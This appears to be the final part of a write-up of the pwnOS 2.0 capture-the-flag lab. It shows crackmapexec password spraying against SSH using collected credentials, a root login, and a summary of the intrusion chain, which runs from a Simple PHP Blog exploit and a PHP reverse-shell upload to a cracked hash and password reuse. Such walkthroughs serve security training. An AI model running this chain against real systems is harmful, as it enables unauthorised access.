Try spraying the collected passwords against SSH. Possible usernames:
administrator
admin
dan
root
hugomc
Possible passwords:
killerbeesareflying
rootISIntS
hugomc
Use crackmapexec to find a working account and password:
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo crackmapexec ssh 10.10.10.100 -p passwords.lst -u users.lst --continue-on-success
SSH 10.10.10.100 22 10.10.10.100 [*] SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
SSH 10.10.10.100 22 10.10.10.100 [-] administrator:killerbeesareflying Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] administrator:rootISIntS Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] administrator:hugomc Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] admin:killerbeesareflying Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] admin:rootISIntS Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] admin:hugomc Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] dan:killerbeesareflying Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] dan:rootISIntS Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] dan:hugomc Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] root:killerbeesareflying Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [+] root:rootISIntS (Pwn3d!)
SSH 10.10.10.100 22 10.10.10.100 [-] root:hugomc Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] hugomc:killerbeesareflying Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] hugomc:rootISIntS Authentication failed.
SSH 10.10.10.100 22 10.10.10.100 [-] hugomc:hugomc Authentication failed.
Got it
┌──(kali㉿kali)-[~/testPwnos2.0]
└─$ sudo ssh root@10.10.10.100
The authenticity of host '10.10.10.100 (10.10.10.100)' can't be established.
ECDSA key fingerprint is SHA256:EWPtTr0Xn9NMudUhcD3AMXSigXAGS4uldZp3grLm8w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.100' (ECDSA) to the list of known hosts.
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Fri Aug 9 18:44:09 EDT 2024

  System load:  0.0               Processes:           77
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 18%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/

Last login: Mon May 9 19:29:03 2011
root@web:~# whoami
root
root@web:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:8d:63:ff brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe8d:63ff/64 scope link
       valid_lft forever preferred_lft forever
Check the privileges
root@web:~# sudo -l
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL
Summary
The nmap scan shows the target has ports 22 and 80 open. Visiting port 80 and brute-forcing directories reveals a CMS running under /blog, and inspection shows it is Simple PHP Blog 0.4.0. A search in searchsploit turns up an exploit script; running it creates a new account in the CMS, which logs in successfully. The back-end image upload does not validate the file type, so a .php file can be uploaded; with a reverse shell in it we get a shell. After the initial shell, information gathering finds two database connection files, one of them the one the CMS is actually using. Its credentials log into the database, where the users table holds a SHA-1 password hash that can be cracked. Spraying the collected passwords then gives a successful SSH login: the person who deployed the CMS had set the Linux root password to the same value as the MySQL root user's password.